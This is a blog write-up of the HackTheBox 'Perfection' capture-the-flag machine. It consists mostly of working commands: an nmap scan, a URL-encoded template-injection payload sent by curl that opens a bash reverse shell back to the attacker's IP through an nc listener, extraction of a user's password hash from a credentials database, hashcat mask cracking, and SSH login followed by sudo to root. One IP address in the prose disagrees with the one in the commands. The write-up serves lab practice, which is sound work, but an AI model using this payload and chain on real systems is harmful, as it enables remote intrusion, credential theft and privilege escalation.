Post

HackTheBox Perfection Writeup

Posted
By x3ric
2 min read

Explore the fundamentals of cybersecurity with the Perfection Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.253 perfection.htb

This ensures that your system can resolve the domain names perfection.htb to the correct IP address 10.10.11.242.

Script to add hosts automatically

1
2
3

ip="10.10.11.253"
domain="perfection.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV perfection.htb

1
2
3
4
5
6
7
8
9
10
11
12

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 11:20 CEST
Nmap scan report for perfection.htb (10.10.11.253)
Host is up (0.054s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Remote Code Execution (RCE)

To exploit the weighted-grade feature on perfection.htb, perform a remote code execution (RCE):

Run a listener to catch the reverse shell:

1

nc -lvnp 9001

Prepare and send the payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

attackerip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
base=$(echo "/bin/bash -i >& /dev/tcp/$attackerip/9001 0>&1" | base64)
revsh="%0A<%25%3d+\`echo+$base|+base64+-d+|+bash\`+%25>"
curl 'http://perfection.htb/weighted-grade-calc' --compressed -X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://perfection.htb' \
-H 'Connection: keep-alive' \
-H 'Referer: http://perfection.htb/weighted-grade-calc' \
-H 'Upgrade-Insecure-Requests: 1' \
--data-raw 'category1=1'$revsh'&grade1=51&weight1=60&category2=2&grade2=10&weight2=20&category3=3&grade3=10&weight3=10&category4=4&grade4=10&weight4=10&category5=5&grade5=0&weight5=0'

Once the reverse shell connects, execute:

1
2

cat "/home/$(ls /home/)/user.txt"
strings /home/$(ls /home)/Migration/pupilpath_credentials.db | awk -F'Susan Miller' '/Susan Miller/ {print $2}'

Brute Force the Hash

1
2
3
4
5

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1400 -a 3 /tmp/hash.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH into the Target

With the cracked password, log in via SSH:

1
2
3

ssh susan@perfection.htb
sudo su
cat /root/root.txt
ctf
htb cft writeup linux
This post is licensed under CC BY 4.0 by the author.